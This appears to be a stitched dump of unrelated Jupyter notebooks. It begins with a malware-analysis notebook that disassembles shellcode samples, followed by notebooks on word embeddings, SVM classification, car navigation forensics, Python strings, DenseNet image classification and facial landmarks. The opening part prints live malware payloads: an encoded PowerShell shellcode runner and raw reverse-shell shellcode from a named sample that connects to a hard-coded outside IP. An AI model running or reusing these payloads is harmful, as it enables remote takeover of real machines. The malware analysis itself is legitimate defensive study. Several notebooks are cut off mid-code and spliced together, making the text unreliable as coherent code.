gAZQA3ACwAMAB4ADIANgAsADAAeABiADAALAAwAHgAZABiACwAMAB4AGQAZQAsADAAeAAwADEALAAwAHgAMQBmACwAMAB4ADIAMwAsADAAeAAzADUALAAwAHgAOQAwACwAMAB4ADYAMwAsADAAeABmADIALAAwAHgANwAzACwAMAB4AGUANgAsADAAeAA4AGQALAAwAHgAYwA2ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABXAHcAUQBwAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQ
BuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABXAHcAUQBwAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABXAHcAUQBwACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQARgBUAEEAdAApACkAOwAkAG4ASwBBACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFUAUwBaACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAFUAUwBaACAAJABuAEsAQQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABuAEsAQQAgACQAZQAiADsAfQA='))
output = disassemble_shellcode (sh6)
output
extract_annotations_from_output(output)
# ## Example 7
# +
sh7 = '+fc,+e8,+82,+00,+00,+00,+60,+89,+e5,+31,+c0,+64,+8b,+50,+30,+8b,+52,+0c,+8b,+52,+14,+8b,+72,+28,+0f,+b7,+4a,+26,+31,+ff,+ac,+3c,+61,+7c,+02,+2c,+20,+c1,+cf,+0d,+01,+c7,+e2,+f2,+52,+57,+8b,+52,+10,+8b,+4a,+3c,+8b,+4c,+11,+78,+e3,+48,+01,+d1,+51,+8b,+59,+20,+01,+d3,+8b,+49,+18,+e3,+3a,+49,+8b,+34,+8b,+01,+d6,+31,+ff,+ac,+c1,+cf,+0d,+01,+c7,+38,+e0,+75,+f6,+03,+7d,+f8,+3b,+7d,+24,+75,+e4,+58,+8b,+58,+24,+01,+d3,+66,+8b,+0c,+4b,+8b,+58,+1c,+01,+d3,+8b,+04,+8b,+01,+d0,+89,+44,+24,+24,+5b,+5b,+61,+59,+5a,+51,+ff,+e0,+5f,+5f,+5a,+8b,+12,+eb,+8d,+5d,+68,+33,+32,+00,+00,+68,+77,+73,+32,+5f,+54,+68,+4c,+77,+26,+07,+89,+e8,+ff,+d0,+b8,+90,+01,+00,+00,+29,+c4,+54,+50,+68,+29,+80,+6b,+00,+ff,+d5,+6a,+0a,+68,+34,+0f,+c2,+1c,+68,+02,+00,+63,+07,+89,+e6,+50,+50,+50,+50,+40,+50,+40,+50,+68,+ea,+0f,+df,+e0,+ff,+d5,+97,+6a,+10,+56,+57,+68,+99,+a5,+74,+61,+ff,+d5,+85,+c0,+74,+0c,+ff,+4e,+08,+75,+ec,+68,+f0,+b5,+a2,+56,+ff,+d5,+6a,+00,+6a,+04,+56,+57,+68,+02,+d9,+c8,+5f,+ff,+d5,+8b,+36,+6a,+40,+68,+00,+10,+00,+00,+56,+6a,+00,+68,+58,+a4,+53,+e5,+ff,+d5,+93,+53,+6a,+00,+56,+53,+57,+68,+02,+d9,+c8,+5f,+ff,+d5,+01,+c3,+29,+c6,+75,+ee,+c3'.replace('+','0x')
## from sample c5b1b5fddd82f205f873bcc1f61f77b4ef9759bc6402cba2a33b3dcf18971f2f
output = disassemble_shellcode (sh7)
output
# -
extract_annotations_from_output(output)
# ## References
#
# * (https://pentest.blog/art-of-anti-detection-3-shellcode-alchemy/) by https://twitter.com/egeblc
# * (http://www.lsd-pl.net/winasm-slides.pdf) by LSD
# * (https://cansecwest.com/core05/core05_metasploit.pdf) by @hdmoore and spoonm
# * (https://www.blackhat.com/presentations/bh-asia-03/bh-asia-03-chong.pdf)
| 32,774 |
/model_training/word_embedding.ipynb
|
8bdb50f3007938ad639025cec102470e3297d7ae
|
[] |
no_license
|
alexding123/Pinar
|
https://github.com/alexding123/Pinar
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 4,933 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import json
import gensim
from gensim.models.keyedvectors import KeyedVectors
import pickle
from collections import Counter
from collections import defaultdict
glove = KeyedVectors.load_word2vec_format("../tests/glove.6B.50d.txt.w2v", binary=False)
# +
with open("../tests/captions_train2014.json") as f:
d = json.load(f)
images = d["images"]
captions = d["annotations"]
# +
import re, string
punc_regex = re.compile(f"[{re.escape(string.punctuation)}]")


def strip_punc(corpus):
    """Return *corpus* with every ASCII punctuation character removed."""
    return punc_regex.sub("", corpus)
# +
def to_counter(doc):
    """Count word frequencies in *doc*, ignoring case and punctuation."""
    cleaned = strip_punc(doc).lower()
    return Counter(cleaned.split())
# -
def to_bag(counters, k=None, stop_words=None):
    """Merge per-document word counters into one sorted vocabulary.

    Parameters
    ----------
    counters : iterable of collections.Counter
        Per-document word counts to merge.
    k : int, optional
        Keep only the *k* most common words (all words when None).
    stop_words : iterable of str, optional
        Words removed from the merged counts before ranking.

    Returns
    -------
    list of str
        Alphabetically sorted vocabulary.
    """
    merged = Counter()
    for counter in counters:
        merged.update(counter)
    # Drop stop words before taking the most-common cut.
    for word in set(stop_words or ()):
        merged.pop(word, None)  # no-op if the word never occurred
    return sorted(word for word, _ in merged.most_common(k))
# +
def to_idf(bag, caption_embeddings):
    """Build an inverse-document-frequency table for the caption corpus.

    Parameters
    ----------
    bag : list
        Vocabulary list; currently unused, kept for interface compatibility.
    caption_embeddings : dict
        Maps caption id -> {"caption": str, ...}.

    Returns
    -------
    collections.defaultdict
        word -> log10(n_captions / count).

    NOTE(review): counts every token occurrence rather than the number of
    captions containing the word, so a word repeated inside one caption is
    counted multiple times — confirm this matches the intended IDF definition.
    """
    counts = defaultdict(int)
    for key in caption_embeddings:
        tokens = strip_punc(caption_embeddings[key]["caption"]).lower().split()
        for token in tokens:
            counts[token] += 1
    n_docs = len(caption_embeddings)
    for token in counts:
        counts[token] = np.log10(n_docs / counts[token])
    return counts
# -
with open("../tests/stopwords.txt", 'r') as r:
stops = []
for line in r:
stops += [i.strip() for i in line.split('\t')]
# +
caption_embeddings = {}
for caption in captions:
caption_embeddings[caption["id"]] = {"caption":caption["caption"], "image_id":caption["image_id"]}
# -
counters = []
for i in caption_embeddings.keys():
counters.append(to_counter(caption_embeddings[i]["caption"]))
bag = to_bag(counters,stop_words=stops)
idf = to_idf(bag,caption_embeddings)
# +
for i in caption_embeddings.keys():
total = 0
x = 0
for w in strip_punc(caption_embeddings[i]["caption"]).lower().split():
if idf[w] == 0 or w not in glove:
continue
x += glove[w] * idf[w]
total += 1
caption_embeddings[i]["embedding"] = x / total
# -
with open("idf_and_caption_embeddings.pkl",mode='wb') as f:
pickle.dump((idf,caption_embeddings),f)
ain[i]))
x_y=x_y[~np.all(x_y == 0, axis=1)]
xtrain_balance=x_y[:,0:4654]
ytrain_balance=x_y[:,4654:]
return xtrain_balance,ytrain_balance
xtrain_balance,ytrain_balance=balance_data (xtrain,ytrain)
# ### Kernel PCA
def stepwise_kpca(X, gamma=0.0001, n_components=123):
    """RBF-kernel PCA: project X onto the leading kernel principal components.

    Parameters
    ----------
    X : np.ndarray of shape (n_samples, n_features)
        Input data.
    gamma : float
        RBF kernel width, K_ij = exp(-gamma * ||x_i - x_j||^2).
    n_components : int
        Number of components to keep (must be <= n_samples).

    Returns
    -------
    np.ndarray of shape (n_samples, n_components)
        Samples projected onto the leading kernel eigenvectors.
    """
    # Pairwise squared Euclidean distances, expanded to a square matrix.
    sq_dists = pdist(X, 'sqeuclidean')
    mat_sq_dists = squareform(sq_dists)
    K = np.exp(-gamma * mat_sq_dists)
    N = K.shape[0]
    one_n = np.ones((N, N)) / N
    # Center the kernel matrix in feature space. The original computed
    # `one_n` but never applied it, dropping the centering step the
    # standard kernel-PCA derivation requires.
    K = K - one_n.dot(K) - K.dot(one_n) + one_n.dot(K).dot(one_n)
    # eigh returns eigenvalues in ascending order, so the leading
    # components are the *last* columns of eigvecs.
    eigvals, eigvecs = eigh(K)
    # Pass a list, not a generator: np.column_stack expects a sequence.
    X_pc = np.column_stack([eigvecs[:, -i] for i in range(1, n_components + 1)])
    return X_pc
# ### Features Selection
# ### Cross Validation Single SVM
def cross_validation_SVM(xtrain, ytrain, number_exp=5):
    """Repeated random-split evaluation of a single RBF SVM.

    Parameters
    ----------
    xtrain : array-like of shape (n_samples, n_features)
        Feature matrix.
    ytrain : array-like
        Binary labels (ROC AUC assumes two classes).
    number_exp : int
        Number of independent 80/20 train/test splits to average over.

    Returns
    -------
    float
        Mean area under the ROC curve across the repetitions.
    """
    acc = []
    under_curve = []
    for j in range(number_exp):
        # Fresh random split each repetition.
        rand_nu = np.random.randint(0, 100)
        X_train, X_test, y_train, y_test = train_test_split(
            xtrain, ytrain, test_size=0.2, random_state=rand_nu)
        # probability=True was dropped: only score() and decision_function()
        # are used, and enabling it triggers a costly internal
        # cross-validation inside SVC without affecting either output.
        clf = svm.SVC(gamma='scale', decision_function_shape='ovo')
        clf.fit(X_train, y_train.reshape(-1,))
        acc.append(clf.score(X_test, y_test) * 100)
        prob = clf.decision_function(X_test)
        under_curve.append(metrics.roc_auc_score(y_test, prob))
    print('total accuracy from {} experiments = {:.2f} % std= {:.2f}'.format(number_exp, np.mean(acc), np.std(acc)))
    print('the total area under the curve = {:.2f} std= {:.2f}'.format(np.mean(under_curve), np.std(under_curve)))
    return np.mean(under_curve)
# ### Cross Validation voting from 3 SVMs
def cross_validation_multi_SVM(xtrain, ytrain, number_exp=5, number_GP=3):
    """Repeated random-split evaluation of a soft-voting SVM ensemble.

    Parameters
    ----------
    xtrain : array-like of shape (n_samples, n_features)
        Feature matrix.
    ytrain : array-like
        Binary labels (ROC AUC assumes two classes).
    number_exp : int
        Number of independent 80/20 train/test splits to average over.
    number_GP : int
        Number of SVM ensemble members. Previously this parameter was
        ignored and exactly three estimators were hard-coded; the default
        of 3 preserves the old behavior.

    Returns
    -------
    float
        Mean area under the ROC curve across the repetitions.

    NOTE(review): the ensemble members are configured identically and
    trained on the same split, so the soft vote reduces to a single SVM;
    consider varying hyper-parameters (e.g. C or gamma) per member.
    """
    acc = []
    under_curve = []
    for j in range(number_exp):
        rand_nu = np.random.randint(0, 100)
        X_train, X_test, y_train, y_test = train_test_split(
            xtrain, ytrain, test_size=0.2, random_state=rand_nu)
        # probability=True is required for voting='soft' / predict_proba.
        members = []
        for g in range(number_GP):
            member = svm.SVC(gamma='scale', decision_function_shape='ovo', probability=True)
            member.fit(X_train, y_train.reshape(-1,))
            members.append(('svm{}'.format(g), member))
        vote = VotingClassifier(estimators=members, voting='soft')
        vote.fit(X_train, y_train.reshape(-1,))
        acc.append(vote.score(X_test, y_test) * 100)
        prob = vote.predict_proba(X_test)
        # Column 1 holds the positive-class probability.
        under_curve.append(metrics.roc_auc_score(y_test, prob[:, 1]))
    print('total accuracy from {} experiments = {:.2f} % std= {:.2f}'.format(number_exp, np.mean(acc), np.std(acc)))
    print('the total area under the curve = {:.2f} std= {:.2f}'.format(np.mean(under_curve), np.std(under_curve)))
    return np.mean(under_curve)
# ### Test
# ## Xtrain, ytrain
print('Single SVM')
cross_validation_SVM(xtrain,ytrain)
print('Multi SVMs')
cross_validation_multi_SVM(xtrain,ytrain)
# ### PCA
X_pc_unbalance= stepwise_kpca(xtrain,gamma=0.00001,n_components=99)
print('Single SVM')
cross_validation_SVM(X_pc_unbalance,ytrain)
print('Multi SVMs')
cross_validation_multi_SVM(X_pc_unbalance,ytrain)
| 5,764 |
/.ipynb_checkpoints/Gini_Lastbin-checkpoint.ipynb
|
788102f614fe8804833748b1416cd56ac032acd9
|
[] |
no_license
|
lky9620/Car_Forensics
|
https://github.com/lky9620/Car_Forensics
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 9,035 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import struct
import folium
def GiniLastbin(data):
    """Decode a Gini navigation ``Last.bin`` record into map coordinates.

    Parameters
    ----------
    data : bytes
        Raw file contents; the first 8 bytes hold two little-endian
        unsigned 32-bit offsets (X first, then Y).

    Returns
    -------
    tuple of int
        (latitude, longitude) in micro-degrees (divide by 1e6 for degrees).
    """
    # A single '<II' read replaces the original two-halfword '<HH' unpack
    # followed by (hi << 16) + lo — byte-for-byte the same little-endian
    # 32-bit interpretation, in one call.
    x_off, y_off = struct.unpack('<II', data[0:8])
    # Offsets are stored relative to a fixed base point (micro-degrees).
    X_Line = x_off + 81284000  # longitude
    Y_Line = y_off + 23820000  # latitude
    return Y_Line, X_Line  # (latitude, longitude)
Last_Data = open('C:/Users/LEEKEONYONG/Desktop/navigation_backup/UserData/Rec/Last.bin', 'rb')
data = Last_Data.read()
Last_Data.close()
GiniLastbin(data)
m = folium.Map([GiniLastbin(data)[0]/10**6,GiniLastbin(data)[1]/10**6], zoom_start = 15)
folium.Marker([GiniLastbin(data)[0]/10**6,GiniLastbin(data)[1]/10**6],tooltip = 'Last.bin에 저장된 장소').add_to(m)
m
| 991 |
/01Python/.ipynb_checkpoints/runoob07 Python3 字符串-checkpoint.ipynb
|
801042867519a241aacbfc4c1b51fb51a260b6a7
|
[] |
no_license
|
HBU/Jupyter
|
https://github.com/HBU/Jupyter
| 3 | 3 | null | 2022-07-06T19:20:58 | 2022-06-29T07:28:04 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 7,314 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # string
# +
# Python 访问字符串中的值
var1 = 'Hello World!'
var2 = "Runoob"
print ("var1[0]: ", var1[0])
print ("var2[1:5]: ", var2[1:5])
# +
# Python字符串更新
var1 = 'Hello World!'
print ("已更新字符串 : ", var1[:6] + 'Runoob!')
# -
print ('\a','\\')
# +
a = "Hello"
b = "Python"
print("a + b 输出结果:", a + b)
print("a * 2 输出结果:", a * 2)
print("a[1] 输出结果:", a[1])
print("a[1:4] 输出结果:", a[1:4])
if( "H" in a) :
print("H 在变量 a 中")
else :
print("H 不在变量 a 中")
if( "M" not in a) :
print("M 不在变量 a 中")
else :
print("M 在变量 a 中")
print (r'\n')
print (R'\n')
# -
# 在需要在字符中使用特殊字符时,python用反斜杠(\\)转义字符。
# +
#Python字符串运算符
a = "Hello"
b = "Python"
print("a + b 输出结果:", a + b)
print("a * 2 输出结果:", a * 2)
print("a[1] 输出结果:", a[1])
print("a[1:4] 输出结果:", a[1:4])
if( "H" in a) :
print("H 在变量 a 中")
else :
print("H 不在变量 a 中")
if( "M" not in a) :
print("M 不在变量 a 中")
else :
print("M 在变量 a 中")
print (r'\n')
print (R'\n')
# +
#Python字符串格式化
print ("我叫 %s 今年 %d 岁!" % ('小明', 10))
# -
para_str = """这是一个多行字符串的实例
多行字符串可以使用制表符
TAB ( \t )。
也可以使用换行符 [ \n ]。
"""
print (para_str)
# ##### 三引号让程序员从引号和特殊字符串的泥潭里面解脱出来,自始至终保持一小块字符串的格式是所谓的WYSIWYG(所见即所得)格式的。
#
# 一个典型的用例是,当你需要一块HTML或者SQL时,这时用字符串组合,特殊字符串转义将会非常的繁琐。
errHTML = '''
<HTML><HEAD><TITLE>
Friends CGI Demo</TITLE></HEAD>
<BODY><H3>ERROR</H3>
<B>%s</B><P>
<FORM><INPUT TYPE=button VALUE=Back
ONCLICK="window.history.back()"></FORM>
</BODY></HTML>
'''
errHTML
import pymssql
# pip install pymssql-2.1.3-cp36-cp36m-win_amd64.whl
print ("start:")
conn = pymssql.connect(host='.',user='sa',password='sql',database='Test', charset="GBK")
cursor = conn.cursor()
cursor.execute('''
CREATE TABLE users (
login VARCHAR(8),
uid INTEGER,
prid INTEGER)
''')
# +
# 0、a,b为参数。从字符串指针为a的地方开始截取字符,到b的前一个位置(因为不包含b)
var1 = "hello world";
#print(var1[a: b]);
# 1、如果a,b均不填写,默认取全部字符。即,下面这两个打印结果是一样的
print(var1[: ]); # hello world
print(var1); # hello world
# 2、如果a填写,b不填写(或填写的值大于指针下标),默认从a开始截取,至字符串最后一个位置
print(var1[3: ]); # lo world
# 3、如果a不填写, b填写,默认从0位置开始截取,至b的前一个位置
print(var1[: 8]); # hello wo
# 4、如果a为负数,默认从尾部某一位置,开始向left截取
print(var1[-2: ]); # ld
# 5、如果a>=b, 默认输出为空。
print(var1[3: 3]);
print(var1[3: 2]);
# -
L=['a','b','c','d','e','f','g']
print(L[::2])
# End of String
net', input_tensor=None, input_shape=None, pooling=None, classes=1000)
# Arguments
# blocks: numbers of building blocks for the four dense layers.
# include_top: whether to include the fully-connected layer at the top of the network.
# weights: one of None (random initialization), 'imagenet' (pre-training on ImageNet), or the path to the weights file to be loaded.
# input_tensor: optional Keras tensor (i.e. output of layers.Input()) to use as image input for the model.
# input_shape: optional shape tuple, only to be specified if include_top is False (otherwise the input shape has to be (224, 224, 3) (with 'channels_last' data format) or (3, 224, 224) (with 'channels_first' data format). It should have exactly 3 inputs channels, and width and height should be no smaller than 32. E.g. (200, 200, 3) would be one valid value.
# pooling: optional pooling mode for feature extraction when include_top is False. None means that the output of the model will be the 4D tensor output of the last convolutional layer. avg means that global average pooling will be applied to the output of the last convolutional layer, and thus the output of the model will be a 2D tensor. max means that global max pooling will be applied.
# classes: optional number of classes to classify images into, only to be specified if include_top is True, and if no weights argument is specified.
# + _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0" _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a" papermill={"duration": 6.230086, "end_time": "2020-11-21T22:02:17.580732", "exception": false, "start_time": "2020-11-21T22:02:11.350646", "status": "completed"}
from keras.applications import densenet
from keras.preprocessing import image
from keras.applications.densenet import preprocess_input, decode_predictions
import numpy as np
from keras.layers import Dense, GlobalAveragePooling2D
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Model
from keras.optimizers import Adam
import os
# + papermill={"duration": 0.027135, "end_time": "2020-11-21T22:02:17.621951", "exception": false, "start_time": "2020-11-21T22:02:17.594816", "status": "completed"}
# Mengumpulkan Gambar Pisang
# Dataset khusus gambar pisang tanduk maupun pisang kepok agak sulit untuk ditemukan. Untungnya kita hanya memerlukan sedikit data untuk transfer learning, sehingga untuk mencari di Google Image lima puluh gambar pisang rasanya masih manusiawi. Untuk sedikit meringankan pekerjaan (kita harus memverifikasi hasil download secara manual), kita gunakan google-image-download.
# Simpan gambar-gambar pisang sehingga struktur folder kita menjadi seperti berikut (andaikan kita punya 50 gambar pisang kepok dan 50 pisang tanduk.
# + papermill={"duration": 0.132899, "end_time": "2020-11-21T22:02:17.769102", "exception": false, "start_time": "2020-11-21T22:02:17.636203", "status": "completed"}
train_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)
train_generator = train_datagen.flow_from_directory('../input/pisangtrain/pisangtrain',
target_size=(224,224),
color_mode='rgb',
batch_size=32,
class_mode='categorical',
shuffle=True)
category_dict = train_generator.class_indices
print(category_dict)
# + papermill={"duration": 5.269402, "end_time": "2020-11-21T22:02:23.053909", "exception": false, "start_time": "2020-11-21T22:02:17.784507", "status": "completed"}
number_of_classes = len(category_dict)
base_model = densenet.DenseNet121(weights='../input/petfinder-densenet/densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5',include_top=False)
#base_model =densenet.DenseNet121(weights='imagenet',include_top=False)
x = base_model.output
x = GlobalAveragePooling2D()(x)
x = Dense(512, activation='relu')(x)
x = Dense(512, activation='relu')(x)
x = Dense(256, activation='relu')(x)
preds = Dense(number_of_classes, activation='softmax')(x)
model = Model(inputs=base_model.input, outputs=preds)
# Print the updated layer names.
# for i,layer in enumerate(model.layers): print(i,layer.name)
# Set the first n_freeze layers of the network to be non-trainable.
n_freeze = 300
for layer in model.layers[:n_freeze]:
layer.trainable=False
for layer in model.layers[n_freeze:]:
layer.trainable=True
# + papermill={"duration": 0.026252, "end_time": "2020-11-21T22:02:23.095787", "exception": false, "start_time": "2020-11-21T22:02:23.069535", "status": "completed"}
print(len(model.layers))
# + papermill={"duration": 0.185859, "end_time": "2020-11-21T22:02:23.297243", "exception": false, "start_time": "2020-11-21T22:02:23.111384", "status": "completed"}
model.summary()
# + papermill={"duration": 180.217779, "end_time": "2020-11-21T22:05:23.536115", "exception": false, "start_time": "2020-11-21T22:02:23.318336", "status": "completed"}
model.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=['accuracy'])
step_size_train = train_generator.n//train_generator.batch_size
model.fit_generator(generator=train_generator,
steps_per_epoch=step_size_train,
epochs=10)
# + papermill={"duration": 4.477901, "end_time": "2020-11-21T22:05:28.062127", "exception": false, "start_time": "2020-11-21T22:05:23.584226", "status": "completed"}
# Without transfer learning.
#default_model = densenet.DenseNet121(weights='../input/petfinder-densenet/densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5')
default_model = densenet.DenseNet121(weights='../input/petfinder-densenet/densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5',include_top=False)
#densenet.DenseNet121(weights='imagenet',include_top=True)
# + papermill={"duration": 11.764845, "end_time": "2020-11-21T22:05:39.875067", "exception": false, "start_time": "2020-11-21T22:05:28.110222", "status": "completed"}
test_path = '../input/pisangtest/pisangtest/'
#test_path = 'pisang-test/'
for directory in os.listdir(test_path):
# Load image.
img_path = test_path+directory
img = image.load_img(img_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
preds = model.predict(x)
default_preds = default_model.predict(x)
# Printing results.
# Default 1000 classes (without transfer learning).
#print(f"Without Transfer Learning Top-2 [{directory}]: \n{decode_predictions(default_preds, top=2)[0]}\n")
# Print transfer learning model top-1
confidence_array = preds[0]
index_max = np.argmax(confidence_array)
# Get KEY (category) by VALUE (index_max) in dictionary
# mydict = {'george':16,'amber':19}
# print(list(mydict.keys())[list(mydict.values()).index(16)]) # Example in one line.
category_names = category_dict.keys()
category_values = category_dict.values()
category_at_index = list(category_values).index(index_max)
category_max = list(category_names)[category_at_index]
print(f"\nWith Transfer Learning [{directory}]: \nTop-1 (confidence)\n{category_max} ({max(confidence_array)*100}%)")
# Print transfer learning model all classes
print("\nClass (confidence)")
for category in category_dict:
category_index = category_dict[category]
value = confidence_array[category_index] * 100
print(f"{category} ({value}%)")
print("\n============================\n")
# + [markdown] papermill={"duration": 0.057679, "end_time": "2020-11-21T22:05:39.991151", "exception": false, "start_time": "2020-11-21T22:05:39.933472", "status": "completed"}
# https://keras.io/api/applications/#resnet
# + papermill={"duration": 0.057179, "end_time": "2020-11-21T22:05:40.106980", "exception": false, "start_time": "2020-11-21T22:05:40.049801", "status": "completed"}
# + papermill={"duration": 4.568149, "end_time": "2020-11-21T22:05:44.733197", "exception": false, "start_time": "2020-11-21T22:05:40.165048", "status": "completed"}
from keras.applications.xception import Xception
from keras.preprocessing import image
from keras.applications.xception import preprocess_input, decode_predictions
import numpy as np
import PIL
from PIL import Image
import requests
from io import BytesIO
# load the model
model = Xception(weights='imagenet', include_top=True)
img = image.load_img('../input/pisangtest/pisangtest/ambon1.jpg')
# resize the image according to each model (see documentation of each model)
img = img.resize((299,299))
##############################################
# if you want to read the image from your PC
#############################################
# img_path = 'myimage.jpg'
# img = image.load_img(img_path, target_size=(299, 299))
#############################################
# convert to numpy array
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
features = model.predict(x)
# return the top 20 detected objects
label = decode_predictions(features, top=10)
label
| 11,351 |
/2D_Gaussian_distribution.ipynb
|
8783a085d047cc7d354ce31aee2d1942895c52ae
|
[] |
no_license
|
wjdgoruds2/Machine_Learning
|
https://github.com/wjdgoruds2/Machine_Learning
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 59,423 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Check landmarks
import pickle
import imageio
import azure
import numpy as np
import matplotlib.pyplot as plt
from glob import glob
import azure
# %matplotlib inline
# +
def load_landmarks(stim='id-1274_AU26-100_AU9-33', api='google'):
    """Load per-frame facial-landmark coordinates for one stimulus clip.

    Parameters
    ----------
    stim : str
        Stimulus directory name under ../../../FEED_stimulus_frames.
    api : str
        Which vision API produced the pickled annotations: 'azure' or 'google'.

    Returns
    -------
    stims : list of str
        Sorted frame image paths (30 frames expected).
    xy : np.ndarray of shape (30, n_landmarks, 2)
        (x, y) pixel coordinates per frame; 27 landmarks for Azure,
        34 for Google.

    Raises
    ------
    ValueError
        If *api* is neither 'google' nor 'azure'.
    """
    stims = sorted(glob(f'../../../FEED_stimulus_frames/{stim}/*/texmap/frame*.png'))
    # number of landmarks: 27 (azure), 34 (google)
    n_lm = 27 if api == 'azure' else 34
    xy = np.zeros((30, n_lm, 2)) # 30 frames
    # NOTE(review): `frames` is built but never read inside the loop — the
    # frame order actually comes from the sorted `stims` paths; confirm the
    # two orderings agree.
    frames = [str(i).zfill(2) for i in range(1, 31)]
    for i, frame in enumerate(frames):
        # Each frame image has a pickled annotation file stored next to it.
        info = stims[i].replace('.png', f'_api-{api}_annotations.pkl')
        with open(info, 'rb') as f_in:
            info = pickle.load(f_in)
        if api == 'azure':
            info = info[0].face_landmarks
            ii = 0
            # Azure exposes each landmark as a Coordinate-typed attribute;
            # dir() yields attributes in sorted name order, which fixes the
            # landmark ordering along axis 1.
            for attr in dir(info):
                this_attr = getattr(info, attr)
                if isinstance(this_attr, azure.cognitiveservices.vision.face.models._models_py3.Coordinate):
                    xy[i, ii, 0] = this_attr.x
                    xy[i, ii, 1] = this_attr.y
                    ii += 1
        elif api == 'google':
            # Google returns an explicit landmark list on the first face.
            info = info.face_annotations[0]
            for ii in range(len(info.landmarks)):
                xy[i, ii, 0] = info.landmarks[ii].position.x
                xy[i, ii, 1] = info.landmarks[ii].position.y
        else:
            raise ValueError("Choose api from 'google' and 'azure'.")
    return stims, xy
stims, xy = load_landmarks(api='azure')
xy
# -
def plot_face(imgs, landmarks, frame_nr=0):
    """Display frame ``frame_nr`` of ``imgs`` with its landmarks overlaid.

    Each landmark is drawn as a single marker (a degenerate 2-point line).
    """
    frame_img = imageio.imread(imgs[frame_nr])
    plt.figure(figsize=(6, 8))
    plt.imshow(frame_img)
    # rows of the (n_landmarks, 2) slice unpack directly into x, y
    for x, y in landmarks[frame_nr, :, :]:
        plt.plot([x, x], [y, y], marker='o')
    plt.show();
# +
import ipywidgets
from ipywidgets import interact, fixed
# Interactive browser: the slider picks one of the 30 frames (0-29) and
# re-draws it with its landmarks via plot_face.
slider = ipywidgets.IntSlider(min=0, max=29, step=1, value=0)
interact(plot_face, frame_nr=slider, imgs=fixed(stims), landmarks=fixed(xy));
# +
from scipy.ndimage import gaussian_filter
# z-score each landmark coordinate across the 30 frames (axis 0)
xy_std = (xy - xy.mean(axis=0)) / xy.std(axis=0)
# band-pass the first landmark's trajectory; fs = 30 frames / 1.25 s
# NOTE(review): butter_bandpass_filter is defined in a LATER cell — this
# cell only works after that cell has been executed at least once.
xy_filt = butter_bandpass_filter(data=xy_std[:, 0, :], lowcut=0.01, highcut=7, fs=30/1.25, order=5)
plt.plot(xy_filt)
# +
from scipy.signal import butter, lfilter
def butter_bandpass(lowcut, highcut, fs, order=5):
    """Design a Butterworth band-pass filter.

    ``lowcut``/``highcut`` are cutoff frequencies in Hz and are normalised
    by the Nyquist frequency (fs / 2) before being handed to
    :func:`scipy.signal.butter`. Returns the transfer-function
    coefficients ``(b, a)``.
    """
    nyquist = fs / 2.0
    return butter(order, [lowcut / nyquist, highcut / nyquist], btype='band')
def butter_bandpass_filter(data, lowcut, highcut, fs, order=5):
